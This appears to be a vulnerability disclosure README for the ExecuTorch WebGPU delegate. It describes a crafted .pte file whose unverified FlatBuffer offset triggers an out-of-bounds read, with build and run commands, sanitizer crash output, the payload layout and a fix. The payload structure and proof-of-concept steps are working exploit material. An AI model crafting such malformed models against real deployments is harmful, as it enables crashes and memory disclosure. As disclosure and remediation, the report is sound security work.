KEEBWZRD's picture
Upload 4 files
b9fda6b verified
|
Raw
History Blame Contribute Delete
8.24 kB

ExecuTorch WebGPU Delegate β€” Runtime Crash Report

Date: 2026-07-14
Finding: OOB read/write triggered by attacker-controlled .pte via missing flatbuffers::Verifier
Vulnerable lines: WebGPUGraph.cpp:378, 537-538, 732-733
Sibling: Vulkan (identical vkgraph schema, VK00) was patched 2026-05-13 β€” WebGPU missed it


What this proves

A live runtime harness that exercises the exact vulnerable code path:

  1. WebGPUBackend.cpp:75 β€” only a 4-byte VkGraphBufferHasIdentifier check; no flatbuffers::Verifier
  2. WebGPUGraph.cpp:378 β€” GetVkGraph(flatbuffer_data) called on the unverified buffer inside build()
  3. WebGPUGraph.cpp:537-538 β€” cs.inline_offset = vk_bytes->offset() stored with no bounds check
  4. WebGPUGraph.cpp:732-733 β€” wgpuQueueWriteBuffer(queue_, dst, 0, constant_data_ + cs.inline_offset, cs.nbytes) β€” OOB read

The malformed .pte sets vk_bytes->offset() = 0xffffffffffff (281 TB past a 64-byte section). UBSan catches the OOB pointer arithmetic, then SEGV on dereference. Exit code 134.


Files

File Purpose
craft_malformed_webgpu_pte.py Generates malformed_webgpu.pte (396 bytes)
malformed_webgpu.pte The crafted payload
runtime_poc_webgpu.cpp Harness reproducing WebGPUBackend.cpp:75 + WebGPUGraph.cpp:378,537-538,732-733
schemas/vkgraph_generated.h Real FlatBuffers C++ schema (same header the backend uses)

Build & Run

# Generate the malformed .pte
python3 craft_malformed_webgpu_pte.py

# Build (macOS/Linux, clang required)
clang++ -std=c++17 -g \
    -fsanitize=undefined \
    -I~/executorch_vuln/third-party/flatbuffers/include \
    -I. \
    runtime_poc_webgpu.cpp -o runtime_poc_webgpu_ubsan

./runtime_poc_webgpu_ubsan malformed_webgpu.pte

Crash Output (confirmed, 2026-07-14)

Note: UBSan alignment errors appear interleaved with PoC trace lines β€” both are caused by the missing Verifier. The alignment errors are FlatBuffers accessing misaligned fields in the unverified buffer (a consequence of the absent pre-parse verification pass); the SEGV is the primary OOB exploit primitive. Both are eliminated by the same two-line fix.

==========================================================
 ExecuTorch WebGPU Delegate Runtime PoC
 CVE class  : CWE-787 (Out-of-bounds Write)
 Source     : backends/webgpu/runtime/WebGPUGraph.cpp
 Root cause : GetVkGraph() called without flatbuffers::Verifier
 Sibling    : Vulkan (same vkgraph schema) was patched 2026-05-13
==========================================================

[+] Loaded .pte: 396 bytes, identifier ET12
[+] WebGPU delegate payload: 238 bytes
[+] VH00 header: fb_offset=30 fb_size=144 bytes_offset=174 bytes_size=64

[PoC] WebGPUBackend.cpp:75: VkGraphBufferHasIdentifier check (4-byte only β€” NO flatbuffers::Verifier)
[PoC] VkGraphBufferHasIdentifier: true
[PoC] WebGPUGraph.cpp:378: GetVkGraph(flatbuffer_data) β€” NO flatbuffers::Verifier
  [UBSan] flatbuffers/buffer.h:180: load of misaligned address for type 'uoffset_t' (4-byte alignment required)
[PoC] GetVkGraph returned: 0x1061bdf62

[PoC] Entering WebGPUGraph::build() constant-source mapping
[PoC] Source: backends/webgpu/runtime/WebGPUGraph.cpp

  [UBSan] member call on misaligned address for type 'Vector<Offset<VkValue>>' (4-byte alignment required)
  [UBSan] member call on misaligned address for type 'Vector<Offset<VkBytes>>' (4-byte alignment required)
[PoC] graph->values()->size()    = 1
[PoC] graph->constants()->size() = 1
[PoC] WebGPUGraph.cpp:493: tensor[0] numel=4 elem_size=4 nbytes=16
[PoC] WebGPUGraph.cpp:516: constant_id=0
  [UBSan] member call on misaligned address for type 'Vector<Offset<VkBytes>>' (4-byte alignment required)
[PoC] WebGPUGraph.cpp:534: constants->Get(0) on unverified FlatBuffer
[PoC] WebGPUGraph.cpp:536: cs.nbytes = tensor.nbytes = 16
[PoC] WebGPUGraph.cpp:537: if (vk_bytes->offset() != UINT64_MAX)
[PoC] WebGPUGraph.cpp:537: vk_bytes->offset() = 0xffffffffffff
[PoC] WebGPUGraph.cpp:538: cs.inline_offset = 0xffffffffffff  (NO bounds check vs constant_data size)
[PoC] constant_data section is 64 bytes β€” offset 0xffffffffffff is WAY past it

[PoC] Entering materialize_constant() (WebGPUGraph.cpp:717-733)
[PoC] WebGPUGraph.cpp:728: cs.inline_offset != UINT64_MAX -> true
[PoC] WebGPUGraph.cpp:732: wgpuQueueWriteBuffer(queue_, dst, 0,
[PoC]                          constant_data_ + cs.inline_offset, cs.nbytes)
[PoC] constant_data_ = 0x1061bdfde
[PoC] cs.inline_offset = 0xffffffffffff
[PoC] cs.nbytes = 16
[PoC] *** OUT-OF-BOUNDS: constant_data_ + 0xffffffffffff is 281474976710591 bytes past a 64-byte section ***

[PoC] Executing OOB pointer arithmetic now...
[PoC] oob_ptr = 0x10001061bdfdd (computed from constant_data_ + 0xffffffffffff)

UndefinedBehaviorSanitizer:DEADLYSIGNAL
==11877==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x0001061bdfdd
    #0 0x000104fa98bc in main runtime_poc_webgpu.cpp:288
    #1 0x00019abafbe8  (<unknown module>)
SUMMARY: UndefinedBehaviorSanitizer: SEGV runtime_poc_webgpu.cpp:288 in main
==11877==ABORTING
EXIT CODE: 134

What the crash proves

The SEGV at runtime_poc_webgpu.cpp:288 is the line:

volatile uint8_t byte = *oob_ptr;  // oob_ptr = constant_data + 0xffffffffffff

This mirrors WebGPUGraph.cpp:733:

wgpuQueueWriteBuffer(queue_, dst, 0, constant_data_ + cs.inline_offset, cs.nbytes);
//                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ OOB source pointer

wgpuQueueWriteBuffer reads from [constant_data_ + cs.inline_offset, + cs.nbytes) to upload to GPU. Any WebGPU implementation will dereference that pointer. With cs.inline_offset = 0xffffffffffff and a 64-byte section, that's a 281-terabyte OOB read.


Payload anatomy

ExecuTorch Program (ET12, 396 bytes)
  └─ ExecutionPlan "forward"
      └─ BackendDelegate id="webgpu"
          └─ WebGPU delegate payload (238 bytes)
              β”œβ”€ VH00 header (30 bytes)
              β”‚   β”œβ”€ flatbuffer_offset = 30
              β”‚   β”œβ”€ flatbuffer_size   = 144
              β”‚   β”œβ”€ bytes_offset      = 174
              β”‚   └─ bytes_size        = 64
              β”œβ”€ VkGraph FlatBuffer (VK00, 144 bytes)
              β”‚   β”œβ”€ values[0]: VkTensor(FLOAT32, dims=[4], constant_id=0)
              β”‚   └─ constants[0]: VkBytes(offset=0xffffffffffff)  ← attacker-controlled OOB offset
              └─ constant_data: 64 bytes of 0xAA  ← tiny; OOB is 281 TB past end

Comparison: what Vulkan has that WebGPU is missing

Vulkan VulkanBackend.cpp (patched 2026-05-13):

flatbuffers::Verifier verifier(flatbuffer_data, header->flatbuffer_size);
ET_CHECK_OR_RETURN_ERROR(
    vkgraph::VerifyVkGraphBuffer(verifier),
    DelegateInvalidCompatibility,
    "VkGraph FlatBuffer verification failed");
const auto* graph = vkgraph::GetVkGraph(flatbuffer_data);  // safe: verifier ran

WebGPU WebGPUBackend.cpp + WebGPUGraph.cpp (HEAD, 2026-07-14):

// WebGPUBackend.cpp:75 β€” 4-byte check only:
if (!vkgraph::VkGraphBufferHasIdentifier(flatbuffer_data)) { ... }
// ... then graph->build(flatbuffer_data, ...) is called at line 102 ...

// WebGPUGraph.cpp:378 β€” NO Verifier before this:
const auto* graph = vkgraph::GetVkGraph(flatbuffer_data);

Same two-line fix. The VerifyVkGraphBuffer function already exists in vkgraph_generated.h β€” zero new code to write.


Fix

// Add in WebGPUBackend.cpp, after the VkGraphBufferHasIdentifier check (line 80):
flatbuffers::Verifier verifier(flatbuffer_data, header->flatbuffer_size);
ET_CHECK_OR_RETURN_ERROR(
    vkgraph::VerifyVkGraphBuffer(verifier),
    DelegateInvalidCompatibility,
    "WebGPU VkGraph FlatBuffer verification failed");

Additionally, WebGPUGraph.cpp:537-538 should add a bounds check:

if (vk_bytes->offset() != UINT64_MAX) {
    if (vk_bytes->offset() > hdr_bytes_size ||
        vk_bytes->offset() + cs.nbytes > hdr_bytes_size) {
        throw std::runtime_error("WebGPU: inline_offset OOB");
    }
    cs.inline_offset = vk_bytes->offset();
}